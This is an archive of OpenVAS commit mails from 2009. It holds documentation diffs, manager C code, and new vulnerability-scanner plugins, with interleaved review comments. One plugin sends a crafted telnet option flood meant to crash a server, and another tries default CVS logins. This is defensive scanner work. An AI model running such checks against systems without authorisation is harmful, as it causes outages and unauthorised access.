+Release 3.0 (Beta status!): The former "OpenVAS server" is now called the "OpenVAS Scanner" and +consists of 2 modules: openvas-libraries and openvas-scanner. The scanner is accompanied by the +optional servers "OpenVAS Manager" (module openvas-manager) and "OpenVAS Administrator" (module +openvas-administrator). +

+ +
-

Readily available installation packages

+

Readily available installation packages (Version 2.0.x)

Please note: OpenVAS 2 series was released recently and may not yet be @@ -335,7 +342,7 @@ http://www.freshports.org.

-

Latest source code release

+

Latest source code release (Version 2.0.x)

The download link for the latest source code release can @@ -370,7 +377,7 @@ Repeat for each module and read the corresponding INSTALL or README files.

-

Most current state of development (directly from the source code management system)

+

Most current state of development (directly from the source code management system) (Version 2.0.x)

You need subversion to retrieve the code. @@ -378,13 +385,51 @@

+$ svn checkout https://svn.wald.intevation.org/svn/openvas/branches/openvas-libraries-2-0
+$ svn checkout https://svn.wald.intevation.org/svn/openvas/branches/openvas-libnasl-2-0
+$ svn checkout https://svn.wald.intevation.org/svn/openvas/branches/openvas-server-2-0
+$ svn checkout https://svn.wald.intevation.org/svn/openvas/trunk/openvas-plugins
+
+

+ +

+Now read the file INSTALL_README +inside the directory "openvas-libraries" for the next steps. +

+ +

+Do the same openvas-server module and read the corresponding INSTALL or README files. +

+ +

+Note for the SVN build: Although the OpenVAS team is committed to maintaining high code quality, please +be aware that you are using a development state that may be incomplete and +unstable and should not be used in production environments. +

+ +

Most current state of development (directly from the source code management system) (Version 3.0.x)

+ +

+You need subversion to retrieve the code. +

+ +

+ $ svn checkout https://svn.wald.intevation.org/svn/openvas/trunk/openvas-libraries
-$ svn checkout https://svn.wald.intevation.org/svn/openvas/trunk/openvas-server
+$ svn checkout https://svn.wald.intevation.org/svn/openvas/trunk/openvas-scanner

+

Optional:

+

-Now read the file INSTALL_README + +$ svn checkout https://svn.wald.intevation.org/svn/openvas/trunk/openvas-manager
+$ svn checkout https://svn.wald.intevation.org/svn/openvas/trunk/openvas-administrator
+
+

+ +Now read the file INSTALL_README inside the directory "openvas-libraries" for the next steps.
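Review bot: The sentence added to the Version 2.0.x SVN section of openvas-server.htm4, "Do the same openvas-server module and read the corresponding INSTALL or README files.", is missing words and names only openvas-server, although the checkout block above it fetches four modules (openvas-libraries, openvas-libnasl, openvas-server, openvas-plugins). Suggest reusing the wording of the source-release section, "Repeat for each module and read the corresponding INSTALL or README files.", so that libnasl and plugins are covered as well.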

Modified: trunk/doc/website/template_header.m4 =================================================================== --- trunk/doc/website/template_header.m4 2009-10-05 13:29:49 UTC (rev 5374) +++ trunk/doc/website/template_header.m4 2009-10-05 13:53:32 UTC (rev 5375) @@ -175,6 +175,14 @@ PDF (de)

+

+ OpenVAS 3.0 BETA:
+ -libraries 3.0.0-beta2
+ -scanner 3.0.0-beta2
+ -client 3.0.0-beta1
+ Optional:
+ -manager 0.9.0
+ -administrator 0.2.0

From scm-commit at wald.intevation.org Mon Oct 5 19:43:10 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 19:43:10 +0200 (CEST) Subject: [Openvas-commits] r5376 - in trunk/openvas-plugins: . scripts Message-ID: <20091005174310.A0FE2852FD79@pyrosoma.intevation.org> Author: mime Date: 2009-10-05 19:43:01 +0200 (Mon, 05 Oct 2009) New Revision: 5376 Added: trunk/openvas-plugins/scripts/apcnisd_detect.nasl trunk/openvas-plugins/scripts/cvs_pserver_heap_overflow.nasl trunk/openvas-plugins/scripts/cvspserver_version.nasl trunk/openvas-plugins/scripts/ms_telnet_overflow.nasl trunk/openvas-plugins/scripts/sympa_detect.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/scripts/cvs_file_existence_info_weak.nasl trunk/openvas-plugins/scripts/cvs_malformed_entry_lines_flaw.nasl trunk/openvas-plugins/scripts/http_header_name_format_string.nasl trunk/openvas-plugins/scripts/monkeyweb_post_DoS.nasl trunk/openvas-plugins/scripts/mssql_brute_force.nasl trunk/openvas-plugins/scripts/secpod_ibm_db2_detect_win_900218.nasl trunk/openvas-plugins/scripts/secpod_prochatrooms_dir_trav_n_xss_vuln.nasl trunk/openvas-plugins/scripts/sybase_blank_password.nasl trunk/openvas-plugins/scripts/webmirror.nasl Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/ChangeLog 2009-10-05 17:43:01 UTC (rev 5376) 
@@ -1,3 +1,32 @@ +2009-10-05 Michael Meyer + + * scripts/cvspserver_version.nasl, + scripts/apcnisd_detect.nasl, + scripts/cvs_pserver_heap_overflow.nasl: + Added new plugins. + + * scripts/secpod_ibm_db2_detect_win_900218.nasl, + scripts/monkeyweb_post_DoS.nasl, + scripts/http_header_name_format_string.nasl, + scripts/secpod_prochatrooms_dir_trav_n_xss_vuln.nasl: + Bugfixes. + + * scripts/cvs_malformed_entry_lines_flaw.nasl, + scripts/cvs_file_existence_info_weak.nasl: + Added cvspserver_version.nasl as dependency. + + * scripts/webmirror.nasl: + Removed debug stuff. + + * scripts/sybase_blank_password.nasl, + scripts/mssql_brute_force.nasl: + Removed dependency "sybase_detect.nasl". Both scripts can do + their job without these dependency. + + * scripts/sympa_detect.nasl, + scripts/ms_telnet_overflow.nasl: + Added plugins developed by LSS Security Team. + 2009-10-05 Chandrashekhar B * scripts/gb_opera_cmd_exec_n_xss_vuln_lin.nasl, Added: trunk/openvas-plugins/scripts/apcnisd_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/apcnisd_detect.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/apcnisd_detect.nasl 2009-10-05 17:43:01 UTC (rev 5376) 
@@ -0,0 +1,78 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# apcupsd and apcnisd Detection Detection +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100292); + script_version ("1.0-$Revision$"); + + desc = "Overview: + This host is running apcupsd or apcnisd . apcupsd and apcnisd + can be used for power mangement and controlling of APC's UPS + models. 
+ + See also: + http://www.apcupsd.com/ + + Risk factor : None"; + + script_name("apcupsd and apcnisd Detection Detection"); + script_description(desc); + script_summary("Checks for the presence of apcupsd or apcnisd"); + script_category(ACT_GATHER_INFO); + script_family("Service detection"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes"); + script_require_ports("Services/unknown", 3551, 7000); + exit(0); +} + +include("misc_func.inc"); +include("global_settings.inc"); + +ports = make_list(7000, 3551); + +foreach port (ports) { + + if(!get_port_state(port))continue; + soc = open_sock_tcp(port); + if(!soc)continue; + req = raw_string(0x00, 0x06); + req += string("status"); + + send(socket:soc, data:req); + buf = recv(socket:soc, length:4096); + + if("APC" >< buf && "STATUS" >< buf) { + register_service(port:port, proto:"apcnisd"); + if(report_verbosity > 0) { + security_note(port:port); + exit(0); + } + } +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/apcnisd_detect.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Modified: trunk/openvas-plugins/scripts/cvs_file_existence_info_weak.nasl =================================================================== --- trunk/openvas-plugins/scripts/cvs_file_existence_info_weak.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/cvs_file_existence_info_weak.nasl 2009-10-05 17:43:01 UTC (rev 5376) 
@@ -43,8 +43,8 @@ script_copyright("This script is Copyright (C) 2004 David Maciejak"); family = "General"; script_family(family); - script_require_ports("Services/cvspserver", port); - script_dependencies("find_service.nes", "cvs_pserver_heap_overflow.nasl"); + script_require_ports("Services/cvspserver", 2401); + script_dependencies("find_service.nes", "cvspserver_version.nasl"); exit(0); } Modified: trunk/openvas-plugins/scripts/cvs_malformed_entry_lines_flaw.nasl =================================================================== --- trunk/openvas-plugins/scripts/cvs_malformed_entry_lines_flaw.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/cvs_malformed_entry_lines_flaw.nasl 2009-10-05 17:43:01 UTC (rev 5376) @@ -51,8 +51,8 @@ script_copyright("This script is Copyright (C) 2004 David Maciejak"); family = "General"; script_family(family); - script_require_ports("Services/cvspserver", port); - script_dependencies("find_service.nes", "cvs_pserver_heap_overflow.nasl"); + script_require_ports("Services/cvspserver", 2401); + script_dependencies("find_service.nes", "cvspserver_version.nasl"); exit(0); } Added: trunk/openvas-plugins/scripts/cvs_pserver_heap_overflow.nasl =================================================================== --- trunk/openvas-plugins/scripts/cvs_pserver_heap_overflow.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/cvs_pserver_heap_overflow.nasl 2009-10-05 17:43:01 UTC (rev 5376) 
@@ -0,0 +1,94 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# CVS Malformed Entry Modified and Unchanged Flag Insertion Heap Overflow Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100289); + script_bugtraq_id(10384); + script_cve_id("CVE-2004-0396"); + script_version ("1.0-$Revision$"); + + script_name("CVS Malformed Entry Modified and Unchanged Flag Insertion Heap Overflow Vulnerability"); + +desc = "Overview: +CVS is prone to a remote heap overflow vulnerability. This issue +presents itself during the handling of user-supplied input for entry +lines with 'modified' and 'unchanged' flags. This vulnerability can +allow an attacker to overflow a vulnerable buffer on the heap, +possibly leading to arbitrary code execution. + +CVS versions 1.11.15 and prior and CVS feature versions 1.12.7 and +prior are prone to this issue. + +**UPDATE: Symantec has confirmed that this vulnerability is being +actively exploited in the wild. Administrators are urged to +upgrade and block external access to potentially vulnerable +servers, if possible. 
+ +Solution: +CVS versions 1.11.16 and 1.12.8 have been released to address +this issue. + +References: +http://www.securityfocus.com/bid/10384 +http://security.e-matters.de/advisories/072004.html?SID=384b888de96e3bce19306db8577fca26 +http://support.coresecurity.com/impact/exploits/62024ecea12fe1bbd01479065b3a1797.html +http://ccvs.cvshome.org/ +http://marc.theaimsgroup.com/?l=openbsd-security-announce&m=108508894405639&w=2 +http://rhn.redhat.com/errata/RHSA-2004-190.html +http://www.us-cert.gov/cas/techalerts/TA04-147A.html + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if CVS is prone to a remote heap overflow vulnerability"); + script_category(ACT_GATHER_INFO); + script_family("General"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("cvspserver_version.nasl"); + script_require_ports("Services/cvspserver", 2401); + exit(0); +} + +include("version_func.inc"); + +port = get_kb_item("Services/cvspserver"); +if(!port)port = 2401; + +if(!get_port_state(port))exit(0); + +if(!version = get_kb_item(string("cvs/", port, "/version")))exit(0); +if(!isnull(version)) { + + if(version_is_less(version: version, test_version: "1.11.15") || + version_in_range(version: version, test_version: "1.12", test_version2: "1.12.7")) { + security_warning(port:port); + exit(0); + } + +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/cvs_pserver_heap_overflow.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/cvspserver_version.nasl =================================================================== --- trunk/openvas-plugins/scripts/cvspserver_version.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/cvspserver_version.nasl 2009-10-05 17:43:01 UTC (rev 5376) 
@@ -0,0 +1,97 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# CVS pserver version Detection +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100288); + script_version ("1.0-$Revision$"); + + script_name("CVS pserver version"); + + desc = "Overview : This script retrieves the version of CVS pserver + and saves the result in KB. 
+ + Risk factor : Informational"; + + script_description(desc); + script_summary("Set Version of CVS pserver in KB"); + script_category(ACT_GATHER_INFO); + script_family("Service detection"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes"); + script_require_ports("Services/cvspserver", 2401); + exit(0); +} + +port = get_kb_item("Services/cvspserver"); +if(!port)port = 2401; +if(!get_port_state(port))exit(0); + +logins = make_list("anonymous", "anoncvs"); +passwords = make_list("","anoncvs", "anon"); +dirs = make_list("/var/lib/cvsd/","/cvs", "/cvsroot", "/home/ncvs", "/usr/local/cvs"); + +foreach dir (dirs) { + foreach login (logins) { + foreach password (passwords) { + + soc = open_sock_tcp(port); + if(!soc)exit(0); + + req = string("BEGIN AUTH REQUEST\n", dir, "\n", login,"\n", "A", pass,"\n", "END AUTH REQUEST\n"); + send(socket:soc, data:req); + buf = recv_line(socket:soc, length:4096); + + if("I LOVE YOU" >< buf) { + + set_kb_item(name:string("cvs/", port, "/login"), value:login); + set_kb_item(name:string("cvs/", port, "/pass"), value:password); + set_kb_item(name:string("cvs/", port, "/dir"), value:dir); + + send(socket:soc, data:string("Root ", dir, "\nversion\n")); + buf = recv_line(socket:soc, length:4096); + + if(egrep(string: buf, pattern: "CVS", icase:TRUE)) { + + version = eregmatch(string:buf, pattern:"([0-9.]+)"); + + if(!isnull(version[1])) { + set_kb_item(name:string("cvs/", port, "/version"), value:version[1]); + exit(0); + } else { + exit(0);; + } + } else { + exit(0); + } + } else { + continue; + } + } + } +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/cvspserver_version.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Modified: trunk/openvas-plugins/scripts/http_header_name_format_string.nasl =================================================================== --- 
trunk/openvas-plugins/scripts/http_header_name_format_string.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/http_header_name_format_string.nasl 2009-10-05 17:43:01 UTC (rev 5376) @@ -51,8 +51,7 @@ if (! get_port_state(port)) exit(0); if (http_is_dead(port: port)) exit(0); -req = http_get(item: strcat("/openvas", rand_str(), ".html"), - "Host: ", get_host_name(), port: port); +req = http_get(item: strcat("/openvas", rand_str(), ".html"), port: port); soc = http_open_socket(port); if (! soc) exit(0); Modified: trunk/openvas-plugins/scripts/monkeyweb_post_DoS.nasl =================================================================== --- trunk/openvas-plugins/scripts/monkeyweb_post_DoS.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/monkeyweb_post_DoS.nasl 2009-10-05 17:43:01 UTC (rev 5376) @@ -59,8 +59,7 @@ soc = http_open_socket(port); if (! soc) exit(0); -r = http_post(item: "/", "Host: ", get_host_name(), - port: port, data: ""); +r = http_post(item: "/", port: port, data: ""); r2 = ereg_replace(string: r, pattern: 'Content-Length:([ 0-9]+)', replace: 'Content-Length:'); if (r2 == r) # Did not match? Added: trunk/openvas-plugins/scripts/ms_telnet_overflow.nasl =================================================================== --- trunk/openvas-plugins/scripts/ms_telnet_overflow.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/ms_telnet_overflow.nasl 2009-10-05 17:43:01 UTC (rev 5376) 
@@ -0,0 +1,90 @@ +################################################################### +# OpenVAS Network Vulnerability Test +# $ID$ +# +# MS Telnet Overflow +# +# LSS-NVT-2009-008 +# +# Developed by LSS Security Team +# +# Copyright (C) 2009 LSS +# +# This program is free software: you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation, either version 2 of +# the License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public +# License along with this program. If not, see +# . +################################################################### + +if(description) +{ + script_id(102008); + script_version("1.0-$Revision$"); + script_bugtraq_id(4061); + script_cve_id("CVE-2002-0020"); + + name = "MS Telnet Overflow"; + script_name(name); + + desc = " +It is possible to crash remote telnet server via malformed protocol options. +This flaw may allow attackers to execute arbitrary code on the system. 
+ +Solution: http://www.microsoft.com/technet/security/bulletin/ms02-004.mspx + +Risk factor :High +"; + + script_description(desc); + + summary = "Attempts to overflow the Telnet server buffer"; + script_summary(summary); + + script_category(ACT_DESTRUCTIVE_ATTACK); + + script_copyright("Copyright (C) 2009 LSS"); + family = "Buffer overflow"; + script_family(family); + script_require_ports("Services/telnet", 23); + exit(0); +} + +##ATTACK## +##Vulnerability tested on AYT commands## +function telnet_attack(port){ + iac_ayt = raw_string(0xff, 0xf6); + bomb_size = 100000; + sock = open_sock_tcp(port); + if(sock){ + bomb = crap(data:iac_ayt, length:2*bomb_size); + send(socket:sock, data:bomb); + close(sock); + return(1); + }else{ + log_message(data:'Can\'t connect to port ' + port); + return(0); + } +} + +##MAIN## +port = get_kb_item("Services/telnet"); +if(!port) port = 23; + +if(telnet_attack(port:port)){ + sock = open_sock_tcp(port); + if(!sock){ + security_hole(port); + }else{ + close(sock); + } +}else exit(-1); + Property changes on: trunk/openvas-plugins/scripts/ms_telnet_overflow.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Modified: trunk/openvas-plugins/scripts/mssql_brute_force.nasl =================================================================== --- trunk/openvas-plugins/scripts/mssql_brute_force.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/mssql_brute_force.nasl 2009-10-05 17:43:01 UTC (rev 5376) @@ -48,7 +48,7 @@ family = "Windows"; script_family(family); script_require_ports("Services/mssql", 1433); - script_dependencie("mssqlserver_detect.nasl", "sybase_detect.nasl"); + script_dependencie("mssqlserver_detect.nasl"); exit(0); } 
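Review bot: The version test in cvs_pserver_heap_overflow.nasl does not match its own description. The text says "CVS versions 1.11.15 and prior" are affected and that 1.11.16 is the fix, but version_is_less(version: version, test_version: "1.11.15") is false for 1.11.15 itself, so a server on exactly that release is not reported. Compare against "1.11.16" instead. The if(!isnull(version)) that follows is redundant, because the line before it already exits when the KB item is missing.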
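Review bot: The auth request in cvspserver_version.nasl is built with an undefined variable: the inner loop is foreach password (passwords), but the request string uses "A", pass, so the value taken from the passwords list is never sent. Use password there. In the same loop soc is opened on every iteration and never closed, including on the continue and exit(0) paths; add close(soc) before moving to the next attempt. Minor: exit(0);; has a stray semicolon.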
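Review bot: ms_telnet_overflow.nasl reads get_kb_item("Services/telnet") but declares no script_dependencies, unlike apcnisd_detect.nasl and cvspserver_version.nasl in this revision, which depend on find_service.nes; without it the KB key may not be set when the script runs and the fallback to port 23 is all that is ever tested. Add the dependency. The header keyword is written # $ID$, which is not the case-sensitive $Id$ keyword that the svn:keywords property set on this file expands; the other new files use $Id$.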
@@ -190,7 +190,7 @@ report = ""; port = get_kb_item("Services/mssql"); -if(!port) port = get_kb_item("Services/sybase"); +#if(!port) port = get_kb_item("Services/sybase"); if(!port) port = 1433; Modified: trunk/openvas-plugins/scripts/secpod_ibm_db2_detect_win_900218.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_ibm_db2_detect_win_900218.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/secpod_ibm_db2_detect_win_900218.nasl 2009-10-05 17:43:01 UTC (rev 5376) @@ -51,6 +51,10 @@ include("smb_nt.inc"); include("secpod_smb_func.inc"); +if(!get_kb_item("SMB/WindowsVersion")){ + exit(0); +} + key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\"; foreach item (registry_enum_keys(key:key)) { Modified: trunk/openvas-plugins/scripts/secpod_prochatrooms_dir_trav_n_xss_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_prochatrooms_dir_trav_n_xss_vuln.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/secpod_prochatrooms_dir_trav_n_xss_vuln.nasl 2009-10-05 17:43:01 UTC (rev 5376) @@ -79,6 +79,7 @@ include("version_func.inc"); +include("http_func.inc"); include("http_keepalive.inc"); pcrPort = get_kb_item("Services/www"); Modified: trunk/openvas-plugins/scripts/sybase_blank_password.nasl =================================================================== --- trunk/openvas-plugins/scripts/sybase_blank_password.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/sybase_blank_password.nasl 2009-10-05 17:43:01 UTC (rev 5376) @@ -45,7 +45,7 @@ family = "Databases"; script_family(family); script_require_ports("Services/sybase", 5000); - script_dependencies("sybase_detect.nasl"); + script_dependencies("find_service.nes"); exit(0); } 
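Review bot: script_require_ports("Services/sybase", 5000) in sybase_blank_password.nasl no longer matches what the script does once sybase_detect.nasl is dropped: the later hunk in this file comments out the get_kb_item("Services/sybase") lookup and hard-codes port = 5000, so only the default port is ever tested. Either keep the KB lookup with 5000 as the fallback, or drop "Services/sybase" from script_require_ports so the metadata matches the behaviour. Delete the old lines rather than leaving them commented out; mssql_brute_force.nasl has the same leftover in #if(!port) port = get_kb_item("Services/sybase");.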
@@ -152,8 +152,9 @@ } -port = get_kb_item("Services/sybase"); -if(!port)port = 5000; +#port = get_kb_item("Services/sybase"); +#if(!port)port = 5000; +port = 5000; found = 0; Added: trunk/openvas-plugins/scripts/sympa_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/sympa_detect.nasl 2009-10-05 13:53:32 UTC (rev 5375) +++ trunk/openvas-plugins/scripts/sympa_detect.nasl 2009-10-05 17:43:01 UTC (rev 5376) 
@@ -0,0 +1,128 @@ +################################################################### +# OpenVAS Network Vulnerability Test +# +# Sympa Detection +# +# LSS-NVT-2009-013 +# +# Developed by LSS Security Team +# +# Copyright (C) 2009 LSS +# +# This program is free software: you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation, either version 2 of +# the License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public +# License along with this program. If not, see +# . +################################################################### + +if(description) +{ + script_id(102013); + script_version("1.1-$Revision$"); + + script_name("Sympa Detection"); + + desc = " +The remote host is running Sympa, an open source (GNU GPL) mailing list management (MLM) software +suite written in Perl. 
+ +See also : + +http://www.sympa.org/ + +Risk factor : None +"; + + script_description(desc); + + script_summary("Detects Sympa"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (C) 2009 LSS"); + script_family("Service detection"); + script_exclude_keys("Settings/disable_cgi_scanning"); + script_require_ports("Services/www", 80, 443); + + exit(0); +} + +include("global_settings.inc"); +include("http_func.inc"); +include("openvas-https.inc"); + + +# Function that checks each dir for Sympa installation +# Optionally can use https + +function CheckSympa(use_https) { + dirs = make_list("/sympa", cgi_dirs()); + + # Go through dirs + foreach dir (dirs) + { + url = string(dir, "/"); + req = http_get(item:url, port:port); + if(use_https==1) + req = https_req_get(request: req, port:port); + else + req = http_send_recv(data: req, port:port); + + if(isnull(req)) return; + + # Check if it is Sympa + pat='Powered by ([^>]*>)?Sympa ?v?([0-9.]+)'; + match=egrep(pattern:pat,string:req, icase:1); + + if(match || egrep(pattern:" Author: mattm Date: 2009-10-05 23:54:23 +0200 (Mon, 05 Oct 2009) New Revision: 5377 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/manage.h trunk/openvas-manager/src/omp.c trunk/openvas-manager/src/ompd.c trunk/openvas-manager/src/otp.c trunk/openvas-manager/src/otp.h trunk/openvas-manager/src/tasks_sql.h Log: Move caching of NVT preferences to the database. * src/otp.h (scanner_init_state_t): Add SCANNER_INIT_DONE_CACHE_MODE. * src/ompd.c (init_ompd): In SCANNER_INIT_GOT_PLUGINS set scanner init to special cache done state when in cache mode. Add SCANNER_INIT_DONE_CACHE_MODE to error check. (serve_omp): Add SCANNER_INIT_DONE_CACHE_MODE to select setup. * src/otp.c (current_scanner_preferences, make_scanner_preferences) (add_scanner_preference): Remove. (init_otp_data): Remove scanner.preferences init. (parse_scanner_preference_value): Call manage_nvt_preference_add instead of add_scanner_preference. 
(process_otp_scanner_input): Add SCANNER_INIT_DONE_CACHE_MODE alongside SCANNER_INIT_DONE. In NVT cache mode, instead of exiting when the NVTs are cached, continue to read the preferences and exit after that. * src/tasks_sql.h (init_manage_process): Also clear NVT prefs. (init_manage): Add outline for database initialisation check. Add table nvt_preferences. (manage_nvt_preference_add, manage_nvt_preferences_enable) (init_nvt_preference_iterator, nvt_preference_iterator_name) (nvt_preference_iterator_value): New functions. * src/manage.h: Add headers. (scanner_t): Remove preferences slot. * src/omp.c (send_preference): Remove. (omp_xml_handle_end_element): In CLIENT_GET_PREFERENCES use new preferences iterator to send preferences. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2009-10-05 17:43:01 UTC (rev 5376) +++ trunk/openvas-manager/ChangeLog 2009-10-05 21:54:23 UTC (rev 5377) 
@@ -1,5 +1,39 @@ 2009-10-05 Matthew Mundell + Move caching of NVT preferences to the database. + + * src/otp.h (scanner_init_state_t): Add SCANNER_INIT_DONE_CACHE_MODE. + + * src/ompd.c (init_ompd): In SCANNER_INIT_GOT_PLUGINS set scanner init to + special cache done state when in cache mode. Add + SCANNER_INIT_DONE_CACHE_MODE to error check. + (serve_omp): Add SCANNER_INIT_DONE_CACHE_MODE to select setup. + + * src/otp.c (current_scanner_preferences, make_scanner_preferences) + (add_scanner_preference): Remove. + (init_otp_data): Remove scanner.preferences init. + (parse_scanner_preference_value): Call manage_nvt_preference_add instead + of add_scanner_preference. + (process_otp_scanner_input): Add SCANNER_INIT_DONE_CACHE_MODE alongside + SCANNER_INIT_DONE. In NVT cache mode, instead of exiting when the + NVTs are cached, continue to read the preferences and exit after that. + + * src/tasks_sql.h (init_manage_process): Also clear NVT prefs. + (init_manage): Add outline for database initialisation check. Add table + nvt_preferences. + (manage_nvt_preference_add, manage_nvt_preferences_enable) + (init_nvt_preference_iterator, nvt_preference_iterator_name) + (nvt_preference_iterator_value): New functions. + + * src/manage.h: Add headers. + (scanner_t): Remove preferences slot. + + * src/omp.c (send_preference): Remove. + (omp_xml_handle_end_element): In CLIENT_GET_PREFERENCES use new + preferences iterator to send preferences. + +2009-10-05 Matthew Mundell + * src/ompd.c (recreate_session): Add openvas_server_free to fnctl fail. (serve_omp): Put the credential args the right way round. Modified: trunk/openvas-manager/src/manage.h =================================================================== --- trunk/openvas-manager/src/manage.h 2009-10-05 17:43:01 UTC (rev 5376) +++ trunk/openvas-manager/src/manage.h 2009-10-05 21:54:23 UTC (rev 5377) 
@@ -41,7 +41,6 @@ certificates_t* certificates; ///< List of certificates. char* plugins_md5; ///< MD5 sum over all tests. GHashTable* plugins_dependencies; ///< Dependencies between plugins. - GHashTable* preferences; ///< Scanner preference. GPtrArray* rules; ///< Scanner rules. int rules_size; ///< Number of rules. } scanner_t; @@ -635,8 +634,26 @@ nvt_selector_nvt_count (const char*, const char*); -/* Lsc_Credentials. */ +/* NVT preferences. */ +void +manage_nvt_preference_add (char*, char*); + +void +manage_nvt_preferences_enable (); + +void +init_nvt_preference_iterator (iterator_t*); + +const char* +nvt_preference_iterator_name (iterator_t*); + +const char* +nvt_preference_iterator_value (iterator_t*); + + +/* LSC credentials. */ + int create_lsc_credential (const char*, const char*); Modified: trunk/openvas-manager/src/omp.c =================================================================== --- trunk/openvas-manager/src/omp.c 2009-10-05 17:43:01 UTC (rev 5376) +++ trunk/openvas-manager/src/omp.c 2009-10-05 21:54:23 UTC (rev 5377) @@ -1690,38 +1690,6 @@ } /** - * @brief Send XML for a preference. - * - * @param[in] key The preferences hashtable key. - * @param[in] value The preferences hashtable value. - * @param[in] dummy Dummy variable for g_hash_table_find. - * - * @return TRUE if out of space in to_client buffer, else FALSE. - */ -static gboolean -send_preference (gpointer key, gpointer value, /*@unused@*/ gpointer dummy) -{ - /* \todo Do these reallocations affect performance? */ - gchar* key_text = g_markup_escape_text ((char*) key, - strlen ((char*) key)); - gchar* value_text = g_markup_escape_text ((char*) value, - strlen ((char*) value)); - gchar* msg = g_strdup_printf ("" - "%s%s" - "", - key_text, value_text); - g_free (key_text); - g_free (value_text); - if (send_to_client (msg)) - { - g_free (msg); - return TRUE; - } - g_free (msg); - return FALSE; -} - -/** * @brief Send XML for a rule. * * @param[in] rule The rule. 
